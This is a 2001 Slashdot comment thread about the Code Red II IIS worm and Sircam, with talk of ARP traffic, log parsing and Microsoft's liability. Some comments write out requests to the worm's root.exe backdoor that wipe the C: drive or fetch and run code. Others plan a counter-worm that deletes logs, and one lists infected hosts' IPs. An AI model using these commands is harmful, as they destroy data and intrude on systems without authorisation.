      19:14:18.460553 B arp who-has 66.74.1.115 tell 66.74.0.1

      --
      -- @rjamestaylor on Ello
    4. Re:Code Red II (or III) on cable modem segments by Anonymous Coward · · Score: 0

      Just to make sure you realize this...The IP addresses listed in the arp requests are the machines being attacked, not attacking machines.

  37. Re:Gnu/Sircam? by Anonymous Coward · · Score: 0

    Well, Emacs probably beat Microsoft to the punch by 20 years. Go Open Source! Woo!

  38. Re:I'm sorely tempted . . . by Anonymous Coward · · Score: 0

    My guess is that command requires the craptive desktop.

  39. Stop Blaming MS Software Bugs! by Anonymous Coward · · Score: 0

    Okay so the worm gets in becaous of a bug, but the damage it does after that is becaus of MSs delibreratly stupid OS design. Where Microsoft is concerned, dont ascribe to stupidity what can be ascribed to malice. The facts prove this to be true, every time!

  40. Outlook is a BUG! by Anonymous Coward · · Score: 0

    "I still think sircam is more annoying since it affects every email user" Every user? That's weird because my netscape email client didn't run it, i must be stupid to run such a client that does not support such nifty and "usefull" features as ActiveX and WSH.

  41. Re:Someone needs to write by Grishnakh · · Score: 2, Funny

    No, someone needs to write a strand that simply shuts down (or better yet wipes out the hard drives of) MS IIS servers. They're a hazard to everyone else on the internet and should be removed.

  42. Re:Anyone still consider this a Microsoft problem? by Anonymous Coward · · Score: 0

    Grin, you are thinking to small, consider a big company, a real big one (100.000 +employees) , well a big company like that cannot say how many servers they have, even less what their IP address is, and it's ridiculous to think they know what software is running on them. How are you going to patch your servers ? Well, they send a mail, please contact us if you know about a computer that uses IIS. It will take a while before they get to fix everything, not to mention that a whole score of people reply like 'What is red worm' , 'What is IIS' , 'Why don't we run Linux' etc etc. Open your eyes !

  43. But I've had CodeRed by mattvd · · Score: 1

    I don't know what you all are talking about...I've been drinking CodeRed for months now. Its red, highly caffinated, and tastes like Mountain Dew. Only fruitier.

    I just I'm just more 1337 than all you.

    :-)

    1. Re:But I've had CodeRed by arielb · · Score: 1

      well you just drank a virus. buhbye!

      --
      ---
  44. Re:I'm sorely tempted . . . by ruisantos · · Score: 0

    format c: /q nope wont work

  45. CodeRed2 Explorer for your viewing pleasure by leonbrooks · · Score: 3, Funny
    It's a bit slap-dash, but here's CodeRed2 Explorer for your PHP-enabled web server. No need for Telnet, even: explore Windows-land a click at a time from the comfort of your browser. (-:

    PLEASE MIRROR THIS and post your mirror URLs in reply to this message (subject Mirror of CodeRed2) since that server is a club server, low bandwidth, low budget. But very secure (Debian on Sparc and well maintained :-)

    SlashDot (the pikers )-: wouldn't let me post directly to this page.

    --
    Got time? Spend some of it coding or testing
  46. Re:Securityfocus asks for IPs by NullAndVoid · · Score: 1

    cat access_log | grep default.ida | tr -d '[' | tr -d ']' | awk '{print $1 " " $4 " " $5}'

    Hmm, tr barfs for me because [ and ] are special (maybe a Solaris peculiarity?). So I used:

    grep default.ida access_log | tr -d '\[\]' | awk '{print $1 " " $4 " " $5}'

    Saved a couple of processes too. *Why* do so many people insist on adding spurious "cat" processes to the beginning of pipelines? It's always at the beginning, too, nobody adds them at the end.

    --


    -- Sigs are for losers
  47. Re:They deserve it by LinuxHam · · Score: 1

    same exploit over a couple of weeks

    Weeks.. heck, months. Some are saying that CRII is reusing the "copy cmd.exe to \scripts" trick that first appeared with the Sadmind/IIS worm... BACK IN MAY!!

    Now THAT is insane! :)

    --
    Intelligent Life on Earth
  48. Re:You think McDonalds is *wrong* to make hot coff by Anonymous Coward · · Score: 0

    It's COFFEE you moron! You can name as much as you want that is protected from casual contact, it doesn't mean something you pour down your throat should give you third degree burns. The woman was driving in a car, and didn't expect to be disfigured by her cup of coffee. I think that's pretty fair. How can you actually be dumb enough to advocate that hot of coffee? Maybe you should have responded to "too cold" complaints with "drink it sooner" instead of just turning it up until it can't be cold no matter how long they take to get to it. I mean I was amazed then that people would be so stupid as to take a stand against her, but now? Still? That's just belligerently stupid.

    And for the record the woman did NOT get millions, just a few thousand that maybe covered her hospital bills. The media just stopped covering it before McD appealed and got her thrown out of court. Just a rude and stupid urban legend now that people use to reinforce idiotic arguments.

  49. Microsoft's biggest victory... by Anonymous Coward · · Score: 0

    ...was to convince the world they are not at fault.

    It is scary that their marketing machine works that well. I hope someone goes after Microsoft soon, 'cuz the way things are going they're gonna keep pumping out buggy code until hell freezes over...

  50. Re:The Breaking Point by Anonymous Coward · · Score: 0
    Open-source is a little different. It comes with a disclaimer that they're not responsible for anything that goes wrong.

    Yes, you're right. Look at this disclaimer I found from the license of an open source project:

    Except for any refund elected by Microsoft, YOU ARE NOT ENTITLED TO ANY DAMAGES, INCLUDING BUT NOT LIMITED TO CONSEQUENTIAL DAMAGES, if the SOFTWARE PRODUCT does not meet Microsoft's Limited Warranty, and, to the maximum extent allowed by applicable law, even if any remedy fails of its essential purpose.
    Oh wait a minute ... that's not an open source project, that's Microsoft Windows.
  51. Re:I'm sorely tempted . . . by IdentityCrisis · · Score: 1

    ah found it here try this instead rundll32.exe Shell32.dll,ExitWindowsEx,0x1

  52. Hey Taco by loconet · · Score: 0

    Code Red II: Shells for the Taking (Score:-1, Redundant)

    --
    [alk]
  53. Re:Origin of Code Red? by Anonymous Coward · · Score: 0

    The drink is called Mountian Dew: Code Red and unlike RedBull or CocaCola the drink itself is actually red. Seeing as how the orriginal mountain dew tastes like a mixture of sprite and urine, I havn't given code red a try yet.

    I wonder if mountain dew sees the code red worm as negative advertising. On the one hand they get the name of their new product plastered all over the media; on the other hand a lot of people (ie the above poster) know that codered is a computer worm and don't even know its a soft drink.

  54. Re:Sadmind/IIS unicode worm already did that by LinuxHam · · Score: 1

    Code Red and Sadmind/IIS does not use the same vulnerability

    The poster was not referring to the type of attack. He was referring to the back door that only CR-II installs on the victim server. CR-II does indeed install the same back door that Sadmind installed.. that is, copying cmd.exe to %iisroot/scripts as root.exe.

    --
    Intelligent Life on Earth
  55. Re:Why do people still use Outlook? by Anonymous Coward · · Score: 0

    You apparently don't know the difference between hot (uncomfortable) water and instantly damaging (near-boiling) water. Try it some time, and post back with results.

  56. This probably would do them a favor by eean · · Score: 1

    I've been going to some of the people that are trying to attack me and the majority are not operating. In otherwords, people who probably completely forget that they even have IIS.

    1. Re:This probably would do them a favor by Lord+Azrael · · Score: 1

      you're right. since at least what i have seen on my server 70% are behind cable oder dsl modems these are the victims which use win nt or win2k for private use only and maybe have never heard of the word patch anyway. it's not the lazy administrators on the boxes where some have not done their homework by applying a 2 month old patch, it really is the stupid windows user who simply purchased win2k for private use and does not even know that he has something running called IIS.

      --
      Lord "not Gargamel's Cat!" Azrael
  57. Re:It is the time by Tackhead · · Score: 1
    > you aren't seeing the other because you're vulnerable to them!

    Yeah, I probably should have explained that I was running Apache at the time, which is what made it something to laugh at rather than worry about.

    I didn't see any actual 'sploit attempts from that IP, so either he was a harmless joker with a web browser, or he was changing the GET string based on how the server identified itself. But if he was doing that, why even send a string to an Apache server. So my hunch is he was just a guy who'd drunk too much coffee.

    (Hmm, configure Apache to misidentify itself as an IIS box the next time a worm shows up... lousy web serving idea, but a nice honeypot idea ;-)

  58. Re:The Breaking Point by daveisoverlord · · Score: 1
    Government Intervention. ...What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances

    With no legislation being passed after the massive DDoS attacks last year on EBay, et al - I seriously doubt anything is going to passed now. I thought that situation was the best chance for legislation. Since many of those companies don't make any money unless people can get to their site, I expected them to lobby heavily for some stiff penalties. When big companies stand to lose big money, you usually see laws passed. So if it didn't happen then, I seriously doubt it will happen now.

    --
    The perception of reality is more important than reality itself.
  59. Re:huge cable modem hits by lqx · · Score: 1
    Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)

    Definitely so. Code Red just randomly picks IP addresses to infect, so you'll see it generating ARP requests to actually get to those IPs .. Even if those IPs aren't connected to anything, hence the ARP requests just keep retrying until they timeout and give up.

    Happy Code Worm Day!

  60. I'm waiting for......... by Veachian64 · · Score: 0, Funny

    the CodeCam worm, a virus that sends private documents on your computer to IIS webservers and posts them on the web.

  61. Re:potential for something worse by Borogove · · Score: 1

    The IIS weakness is found. The CodeRedII System goes on-line August 4th, 2001. Human decisions are removed from strategic hacking. CodeRedII begins to spread at a geometric rate. It becomes self-aware at 2:14AM, Eastern Time, August 29th.

    --
    There has been a major scientific break-in
  62. Re:How to send a message to the poor bastards by Anonymous Coward · · Score: 0

    Here are some for you to play with:
    210.15.27.11
    210.15.17.156
    210.15.70.130
    210.15.79.10
    210.242.87.148
    210.92.49.34
    210.15.70.130
    210.15.79.10
    61.151.173.137
    210.124.96.195
    210.106.80.201
    210.202.66.18
    cj3134709-a.ntkyo1.kn.home.ne.jp [210.20.139.79]
    210.15.76.239
    210.15.63.83
    210.15.55.13
    210.115.164.54
    198.c210-85-176.ethome.net.tw [210.85.176.198]
    210.122.63.65
    210.91.175.16
    210.12.28.65

    210.237.124.68
    210.15.67.150

    210.77.142.2

    210.122.63.86
    210.15.70.141
    210.15.79.10
    176.c210-85-25.ethome.net.tw [210.85.25.176]
    210.232.202.179
    210.15.67.150
    210.15.17.140
    210.123.115.186
    210.102.139.83
    210.15.17.140
    210.15.67.150
    210.15.79.10
    210.83.133.35
    210.15.12.18
    pl211.nas921.d-osaka.nttpc.ne.jp [210.165.118.211]
    210.15.19.173
    210.119.226.72
    210.15.56.8
    210.15.79.10
    210.15.56.8
    64-60-43-221-cust.telepacific.net [64.60.43.221]
    210.183.167.20
    210.15.79.10
    210.15.17.156
    210.119.189.87
    210.15.19.173
    210.15.77.146
    shiva.sp-net.ne.jp [210.227.141.5]
    208.238.182.66
    210.181.182.243
    210.15.77.146
    210.103.161.177
    c554707-a.plstn1.sfba.home.com [24.176.135.110]

    210.200.130.3
    210.15.25.92
    210.15.18.242
    210.15.25.92
    210.15.17.140
    210.15.17.140
    210.15.70.130
    210.241.64.1
    210.15.70.130
    210.122.95.170
    210.15.27.38
    210.15.56.23
    210.15.18.242
    210.15.27.38
    210.15.63.70
    210.71.231.69
    s210-218-165-218.thrunet.ne.kr [210.218.165.218]
    47.c210-85-26.ethome.net.tw [210.85.26.47]

    210.15.78.121
    210.78.24.21
    210.118.64.125
    210.106.81.187
    h240-210-68-8.adcast.com.tw [210.68.8.240]
    210.15.6.205
    210.201.195.124
    210.93.198.18
    210.15.12.18
    210.15.41.235
    210.15.72.1
    TP-AS233-Dialup-34.my.net.tw [210.244.230.34]
    210.15.78.121
    210.15.78.121
    210.123.218.70
    h240-210-68-8.adcast.com.tw [210.68.8.240]
    s210-205-192-225.thrunet.ne.kr [210.205.192.225]
    210.115.4.194
    210.119.188.69
    ss00-042.ppp.mediawars.ne.jp [210.233.65.170]

    Have fun folks.

  63. Re:It's easy to secure your IIS.. by Telek · · Score: 1

    (pardon the caps, but I'm pissed) AND I AM SICK AND TIRED OF EVERYBODY BLAMING MICROSOFT AND THEIR PRODUCTS FOR PROBLEMS THAT ARE NOT ALWAYS THEIR FAULT. Yes yes yes, every software is going to have problems, *nix'es have all had theirs. The problem here lies in the fact that the majority of servers that have been compromised are either (a) small personal-type sites or (b) don't even realize that they are running a server. It's hard to tell people to protect their systems when they don't even think that it's their system that they need to protect. And before you go bashing MS about this one (i.e. that it's installed by default) keep in mind that if the user knew what they were doing, they'd either disable it or would know to secure it. People who use *nix tend to be technosavvy and therefore will be very consciencous about what software they're running and apply the patches at the proper times, whereas W2K admins aren't always "on the ball". But stop blaming microsoft for everything here.

    --

    If God gave us curiosity
  64. ARP - Address Resolution Protocol by Anonymous Coward · · Score: 0

    here is what some ARP Requests look like: 21:58:37.540138 arp who-has 24.160.158.68 tell 24.160.158.1 21:58:37.581758 arp who-has 24.167.113.97 tell 24.167.112.1 21:58:37.618142 arp who-has 66.69.10.33 tell 66.69.10.1 21:58:37.708154 arp who-has 24.162.168.66 tell 24.162.168.1 each computer keeps a local ARP table of where to send packets to specific computers (mac addresses). If it doesn't know, it sends out a broadcast 0.0.0.255 to ask everyone else if they know. (now, others may think they know and actually be incorrect= arp poisioning, which leads to man-in-the-middle attacks and nasty stuff) This follows up the chain, kinda like DNS requests, till it finds out where to send the data. So thats basically how it works, and since many machines on your cable modem subnet 1.2.3.x (up to 254 machines) may be running win2k IIS and be infected, when the worm randomly chooses new IPs to connect to, it has to find out where to go. The worm sends to about 300 or 600 new IPs, so that many times the infected machines on your subnet.. thats how many arp requests/replies your going to see being sent around. hope it helps, look up Address Resolution Protocol and perhaps the RFC (request for comments about it). http://whatis.techtarget.com/definition/0,289893,s id9_gci213780,00.html

  65. Re:this sucks by aechols · · Score: 1
    yes, it means script kiddies can run their little programs with even more ease. syn floods, stealth searches, etc. the classic attacks like ping of death, teardrop, boink, and friends need a raw socket to make malformed packets. although these are not threats any more, similar holes are bound to appear.

    my point about raw socket support & code red is that a similar worm could appear, one that requires the use of malformed packets to take control of the IIS server/other microsoft product. it would be able to make these malformed packets by utilizing raw sockets

    --
    Are you pondering what I'm pondering?
  66. Mother of IIS worms by Anonymous Coward · · Score: 0

    It's gonna be a regular script kiddie square dance in the weeks and months ahead. Thousands upon thousands of hosts from which attacks can be launched are now up for the taking.

  67. Someone needs to write by mashy · · Score: 0, Redundant

    Someone needs to write a new strand of Code Red that infects servers with the patch from MS.

    I'm sick of all this wasted logfile space.

    1. Re:Someone needs to write by siokaos · · Score: 1

      No, sadly, it would be a very complicated algorithm to parse all the facets of the english language, and find similar ideas. I was using a recursive example, just as that, an example, not being serious.

      --
      http://siokaos.org/
    2. Re:Someone needs to write by Anonymous Coward · · Score: 0

      sorry, HTML formatting was ON...

      ftp -s:

    3. Re:Someone needs to write by Anonymous Coward · · Score: 0

      ftp -s:

    4. Re:Someone needs to write by norton_I · · Score: 2, Interesting

      That is probably illegal, and certainly a bad idea (self reproducing code almost always causes problems even when you don't intend it to) but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.

    5. Re:Someone needs to write by siokaos · · Score: 1

      Someone needs to write code into SlashCode that will remove redundant comments. Someone posted this idea just yesterday.

      "someone needs to"... comments suck, the way I see them is "Someone needs to learn a programming language" i.e. the poster!

      --
      http://siokaos.org/
    6. Re:Someone needs to write by Anonymous Coward · · Score: 0

      I'd like to see you do it even if you knew the right languages, fucking hypocrite, troll.

    7. Re:Someone needs to write by nyet · · Score: 2


      GET /scripts/bash.exe?-c%20"/c/inetpub/scripts/wget.ex e%20http://mssjus.www.conxion.com/download/winntsp /patch/q300972/nt4/en-us/q300972i.exe"


      tried that. Unfortunately, you need cygwin wget. Is there an explorer.exe equivalent to wget?

    8. Re:Someone needs to write by spongman · · Score: 2
      sure, here's some javascript that'll do the same thing:
      var req=WScript.CreateObject ("MSXML2.XMLHTTP");
      req.open ("GET", WScript.Arguments (0), false, "", "");
      req.send ();
      WScript.Echo (req.responseText);
      for example, create a file 'get.js' with that script in it, and do 'cscript get.js "http://www.google.com"'. You could also do this from an ASP page. You might need to upgrade IE, or get the XML parser update from MS for this to work right.
    9. Re:Someone needs to write by DNS-and-BIND · · Score: 1

      wget isn't exactly what you could call a standard tool, much less on win32.

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
    10. Re:Someone needs to write by Anonymous Coward · · Score: 0

      I tried to use ftp + .netrc file to automate an ftp session that would be able to get the patch, but the problem is I couldn't find a way to get the MS ftp client to use an .netrc file. For anyone who dosen't know a .netrc file is, it's placed in a users home directory, and can be used to automate ftp login and commands. The ms ftp client seems to support this (on win2k at least), in that it has a command line switch to disable this behavior. The question is, what is a home dir on win2k? I set an enviroment var(HOME) to a directory w/the .netrc file, but that dosen't seem to work. The other thing here is that patching the webserver won't really fix the problem, you'd have to remove all the worm's damage, the trojaned explorer.exe, the addition of the c and d drives as accesable dirs, and the addition of the cmd.exe(root.exe) to acessable web dirs. Although it would be possible to create an .exe to do all this, it's beyond my ability.
      What I think would be needed to disable the worm on a webserver is:
      1:create a program that listens on port 80 for the worm, then when it gets a request that is from an infected computer
      2: on the infected machine echo data to a .netrc file so you could automate the ability to login to an ftp and download a fix for the worm(if .netrc can work on windows)
      3: execute the file
      4: delete the IIS log file for the current day(so you could worry less about being 'caught')
      5: reboot the webserver, or maybe send a message to the current user that they need to reboot


      Everything here can be done with the possible exception of the .netrc file. I'm sure there is another way to automate the dl of an .exe file, but I can't think of one right now. Also for the most part this would be completly non-destructive, with the possible exceptions of deleting a log file and rebooting the server. This might seem a bit extreme but today alone I received 400+ exploit attempts from this worm(of course I run apache/linux so it had no effect)

      -aminidab

  68. It is the time by Pat__ · · Score: 1, Redundant

    I think it is about time to write the exploit that will take all those vulnerable IIS servers with a open command shell and remotely patch them once and for all :-)
    At least to get it over with this Code Red thingy!

    On a completely other note! I was thinking it would be nice if the worm copied random text strings (from the victim's hard drive) instead of the XXXXXXXXX in order to overrun the buffer :) Then it would be really interesting to read those log files!

    1. Re:It is the time by Tackhead · · Score: 2
      > On a completely other note! I was thinking it would be nice if the worm copied random text strings (from the victim's hard drive) instead of the XXXXXXXXX in order to overrun the buffer :) Then it would be really interesting to read those log files!

      Well, I haven't seen that yet, but I saw something even funnier:

      999.999.999.999 - - [04/Aug/2001:23:43:18 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXJust_Kidding___Now_H ow_About_Running_Apache_Instead_of_IIS HTTP/1.0" 404 282 "-" "-"

      (Yes, just some guy with a sense of humor and a web browser, not enough Xs to trigger the overflow ;-)

    2. Re:It is the time by ass1m1l8 · · Score: 1
      On a related note, since most of these new Code Red attacks are relatively local to you, you can helpfully inform people that they've been infected by using "net send".

      Proper syntax: net send "Your system appears to be harbouring the Code Red virus. Please patch your IIS server"

      This should cause a dialogue box to pop-up on the target system with your message in it. They have to click on "OK" to get it to go away.

      --
      relatively personable misanthrope, incognito.
    3. Re:It is the time by tstock · · Score: 1

      How about a perl or sh script to:

      parse logfile;
      extract IP's that are infected
      nslookup their domain
      email root@domain form letter

      please email me if anyone did this.

    4. Re:It is the time by FuegoFuerte · · Score: 1

      how do you tell net send what machine to send to? I've been playing with it a bit on my win2k box and can't get any messages to pop up on my screen. I tried `net send 127.0.0.1 "hello"` and got error 2273. ("The message alias could not be found on the network.") I also tried using my netbios name and my NICs IP address, to no avail.

    5. Re:It is the time by Anonymous Coward · · Score: 0

      What scares me about this variant is dumbshits in my organization that dial their machine up to the Internet (from the internal network), get infected and then disconnect. Before, there was little chance of the worm hitting internal machines,not visible to Internet, which are mostly NOT patched at my org. Now 1 machine on the inside will be able to fook the entire internal private net.

    6. Re:It is the time by p_trinli · · Score: 1

      Naw, man, White Hats should make their counter-virus install the ultimate patch:

      ...Linux (FreeBSD, etc.)

    7. Re:It is the time by cluthu · · Score: 1

      Assuming my hostname was 'bloggs' (it isn't, btw), I run: net send bloggs hello and it'll open up a window. You have to be running the Messanger service for this to work.

    8. Re:It is the time by spectral · · Score: 0

      administrator@domain would be better, considering their nt/2k boxen.

  69. Re:Origin of Code Red? by Corrado · · Score: 1

    Code Red is the new cherry flavored Mountain Dew.

    --
    KangarooBox - We make IT simple!
  70. MOD this up (+1 funny) ! by whizzmo · · Score: 1

    (sorry, but I gotta)

    --
    nuclear presidential echelon assassination encryption virulent strain
    Whizzmo
  71. Re:Gnu/Sircam? by Anonymous Coward · · Score: 0

    If you went to Edit -> Preferences -> Netscape -> Applications, you could set up a MIME type that ran the attachment. It would have to specify the interpreter, see the Postscript entry for an example. So, you could do it, but you'd have to work at it, Netscape isn't vulnerable by default.

  72. Re:Wasted bandwidth by sqlrob · · Score: 1

    Just cause it's in a EULA doesn't make it enforceable.

  73. Re:huge cable modem hits by interiot · · Score: 2

    If you consider that @Home's acceptable use policy explicitely says that running servers isn't allowed... there are two interesting things to note. First, there are a lot of people running public web servers that @Home just ignores. Another thing is that it probably wouldn't be a problem legally for @Home to minimize the impact of code red by blocking port 80 traffic like they did with port 137, at least temporarily.

  74. The old /scripts/root.exe by Gnight · · Score: 1
    Copying cmd.exe into the /scripts directory to gain access to the system is nothing new.

    One bug in IIS's let you (through HTTP requests) access the filesytem and run simple commands (this is very sad). The first thing that a cracker would do is copy cmd.exe into the scripts directory.

    One of the servers at my school got hacked this way. I just had to laugh at the simplicity of the hack.

  75. Re:Code Red Infects Slashdot! by Anonymous Coward · · Score: 0
    I'm sure when the hindenberg burned, it got multiple mentions on slashdot. Or the fall of the roman empire. These are all historically important events.

    It is on or near this day that Microsoft's software became, without a doubt, a public nuisance to the internet.

    Microsoft is a bad neihbor, whose allowed their yard to fill with filth and trash, subjecting the people around them to the vermin and roaches that breed within their unkempt property. It is on this day that the internet will begin to sputter and fail in places due to the tremendous burdon Microsofts incompetence has placed upon it.

    Microsoft's products spew pollution into the information space like a burning mountain of tires.

  76. Re:I'm sorely tempted . . . by Phroggy · · Score: 5, Insightful

    Unfortunately, it doesn't look like the root.exe installed by Code Red has Administrator privaleges, which iisreset.exe needs. Or at least, that's my guess, since it isn't working.

    --
    $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
    $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
  77. Re:Logging the worm by Amerist+A'Toll · · Score: 1
    Really nice!

    I just got permission to put something up on my work's web page that allows us to track the number of hits by Code Red (and Code Red II) but I haven't had time to put anything so sophistocated together. Bravo.

    Current Code Red Worm Hits Count

    Mind releasing code/information on how you did that one?

    On other fronts, one of my co-workers is informing me that he's getting hundreds of such hits on his boxen sitting on the COX@home network, most of them seem to be originating from other COX@home addresses. I did see some mention that there has been lots of COX activity. I wonder what's the reason for that.

    Amerist A'Toll

    --
    "What are dreams when we are but the dreams of dreamers yet to be born?"
  78. Re:The Breaking Point by Malcontent · · Score: 4, Interesting

    You can't sue MS (they are bigger then the govt prectically). But you can probably sue and company which uses IIS and stores your personal data. If that comapny was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
    Everybody wins.

    --

    War is necrophilia.

  79. Re: Port 80 is now blocked in my area by Anonymous Coward · · Score: 0

    sfba.home.com seems to be blocked. And I'm desperately seeking a new ISP...telocity look snice, but the last time I tried to get DSL via PacBell, they said I was too far from the switching office.

  80. Re:Microsoft Internet Pollution - My Server Log! by jeremyp · · Score: 4, Interesting

    There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.

    Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.

    --
    All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
  81. Good command to send back... by Anonymous Coward · · Score: 0

    If you were bored, you could setup a program to send something like: http://infected_system/scripts/root.exe?/c+net+sen d+localhost+you+have+been+infected+by+codered+2+pa tch+IIS

  82. Re:File download script by Anonymous Coward · · Score: 0

    Here is another good article on it at securityfocus.com.

  83. Re:This will put a bandaid on the problem: by Telek · · Score: 1

    actually there isn't a "non executable" flag for windows.... changing the extension is good enough.

    --

    If God gave us curiosity
  84. Re:potential for something worse by Anonymous Coward · · Score: 0
    Someone wrote some concept code that did something quite close to this. It even had a gnutella like network, and it was written before gnutella was even created. They called it wormnet or something. Very interesting paper that described it, I think the paper was called "I don't think I love you" and was published to show just how pathetic a worm the I LOVE YOU worm was.

    Trusty google. First hit is the paper I was looking for. Enjoy.

  85. Wasted bandwidth by peterprior · · Score: 1

    Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software? This thing must have consumed quite a lot of bandwidth, and if you're on a "pay per mb" connection, its going to cost you a lot.

    1. Re:Wasted bandwidth by Anonymous Coward · · Score: 0

      Microsoft license agreements don't mean diddly to us Unix only users! Their products still cost us a lot. Filled up mail servers (SirCam, et. al.), bandwidth (Code Red, et. al.) and such. So, the way I read it, Microsoft can be sued since the Unix/Linux community never bought into their stupid EULA anyway.

    2. Re:Wasted bandwidth by isorox · · Score: 1

      I mistook the original poster as being a windows server. NO they dont, but the attacking computer's EULA will. You have sue them. Of course, you dont sue slashdot if your site gets slashdotted do you?

    3. Re:Wasted bandwidth by isorox · · Score: 2

      Nope, look at your EULA

    4. Re:Wasted bandwidth by NetJunkie · · Score: 1

      Sue your admin. They didn't patch it. Microsoft released a patch in time for the first wave of this.

      You really don't want to start this..just wait until Linux is popular enough to attack. How many default Red Hat servers do you think are out there? A LOT. We had a couple of stock Red Hat 6.1/6.2 boxes at my current work when I started.

    5. Re:Wasted bandwidth by Velox_SwiftFox · · Score: 2
      Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software?
      Nope, look at your EULA

      Microsoft's EULA prohibits me from suing them for bandwith charges for the stuff their crap throws at my Linux/Apache setup?

      Wow, they must have better lawyers than I thought.

    6. Re:Wasted bandwidth by dbarclay10 · · Score: 2

      Well, the EULA still applies :) You couldn't sue Microsoft, but you could sue the companies whos servers are infected(and hence spamming your box).

      MS has absolutely no liability(legally) in this particular instance. Personally, I think it's gross negligence on their part, and I think some *severe* measures are in order.

      Quite frankly, I don't give a shit that they're a monopoly. My local telephone monopoly is *wonderful*. Very nice, very courtesous. As a business owner and a consumer, I'm very happy with them. But Microsoft is just plain mean and negligent.

      Dave

      --

      Barclay family motto:
      Aut agere aut mori.
      (Either action or death.)
    7. Re:Wasted bandwidth by einhverfr · · Score: 2
      Actually, the patch was released in June after the overflow was discovered by eeye.com... Lousy admins did not apply the patch or read the advisory (MS01-033).

      I do think that MS deserves some blame because they have made it insanely easy to administrate an NT box functionally by insanely hard to do so competently. The OS is user friendly but very obfuscatory (note that even apple never marketed Macintosh as a server, at least not until OS X-- they sold servers running Apple UNIX). How many questions on the MCSE exams covered planning for disaster recovery or planning for internet security (hint: less than one)? Those of us who prefer UNIX do so because it is easier to administrate properly though it requires more knowledge to do basic tasks... The learning curve is constant and does not get as steep as NT's does...

      Microsoft also has a history of poor security programming. For example, the Microsoft implemtation of PPTP uses the users a hash of network password for the encryption key for the session. This does not necessarily make it easy to break into an account, but it does effectively prevent any forward security because your key will not change until your password does... I would not trust them with any critical information or production servers, and that includes IIS.

      Not that it matters really-- of FreeBSD and Linux can gain enough dominance, they can effectively take the money out of the small server OS (fewer than 4 processors) and that would be a major blow to Microsoft and it would prevent them from being able to make billions off that industry...

      --

      LedgerSMB: Open source Accounting/ERP
    8. Re:Wasted bandwidth by MackE · · Score: 1

      Now, I don't think I could sue Microsoft over this and win, but I'll be DAMNED if it's because of a EULA for a product I don't even have. IANAL, but I doubt if 'hold harmless' clauses are an absolute defense.

    9. Re:Wasted bandwidth by spectral · · Score: 0

      If someone buys a car from a dealer, and then the car is discovered to have a flawed piece (let's say brakes). They issue a recall to fix it. They don't just start delivering new brakes that aren't problematic to the dealers. They recall all the cars. This may not be EASILY feasible on the internet, but with netcraft and them around, it sure can't be hard to just quickly scan EVERY IP, checking for IIS, and notifying them somehow. THEN it becomes the administrator's fault. If Car Dealer X put out the new part and made a half-assed attempt to announce it, then one of their faulty cars caused me to be the helpless victim in an accident because SOMEONE ELSE was driving one of their cars, you better fuckin believe I'd sue their ass.

  86. Whatever by Anonymous Coward · · Score: 0

    Ever since code red II came out, my paranoid shield buzzes about once every 5 to 10 minutes when I'm on the net. Ugh. There it goes again. Bored chick, also known as Anonymous Coward

  87. Re:Origin of Code Red? by ether0 · · Score: 1

    "Code Red" is cherry flavored Mountain Dew

  88. Re:The Breaking Point by beable · · Score: 1
    djbdns is an open source replacement. you get a cash award for finding vulnerabilities in it.
    Big deal. You can't prove that something is secure that way. Suppose you worked out how to crack root using djbdns. Are you going to take the cash prize, or are you going to wait until you can get root on a bank's machine and get some REAL moola?

    Does anybody know what the target will be for this version of Code Red Worm? It'd be pretty funny if it was microsoft.com.
    --
    ...
  89. Re:SirCam procmail recipe by Anonymous Coward · · Score: 0

    Yes, it is slashdots fault. It deliberately inserts spaces into anything that is greater than 80 characters (or so) long. This is to stop crap flooders from causing you to need to scroll sideways.

  90. Re:I cant believe... by Telek · · Score: 1

    folders get their dates updated when files in them get updated, so this is not necessarily a new installation...

    --

    If God gave us curiosity
  91. One simple HTTP request that nukes C: by Pilferer · · Score: 1

    The following HTTP request will erase everything on the infected machine's C: drive, which prevents it from attacking more machines, and possibly makes the user consider installing Linux rather then reinstalling WinNT/2K:

    http:// {infected ip here } /scripts/root.exe?/c%20del%20/Q%20/F%20/S%20c:\*.*

    Yeah, I know, it's NASTY, but...

    1. Re:One simple HTTP request that nukes C: by Anonymous Coward · · Score: 0

      try this instead

      http:// infected.ip

      /scripts/root.exe?/c%20rmdir%20/S%20/Q%20C:

    2. Re:One simple HTTP request that nukes C: by CTho9305 · · Score: 1

      if you're going to nuke them, why not setup up apache? just set up whatever long bat file is required (using echo blah >file) and then run it... have it download linux, or get and install apache

    3. Re:One simple HTTP request that nukes C: by Anonymous Coward · · Score: 1, Insightful

      This uncovers an NT problem: you can't erase a file that is in use. The del command will probably abort upon finding the first file that it can't delete.

      I've done this before to myself.

  92. Re:Yup, sircam is more annoying by Anonymous Coward · · Score: 0

    I will tell you, though, that these little punks writing these things need to be dragged into the street and publicly shot.

    Bring it, asshole. Has it ever occured to you that these viruses are only possible because jackasses like yourself run entire networks on crap (M$) software? If your employer were better informed he/she would get rid of all their MCSE dickheads and move to a better platform. I'm not even advocating just one; there are enough flavors of open/free/secure OSes out there that no one has an excuse to be running a network on M$ shit anymore. And if you ever get one of the little punks out in the street I think you'll quickly find that you are no match for them.

  93. This is incredible! by Anonymous Coward · · Score: 0

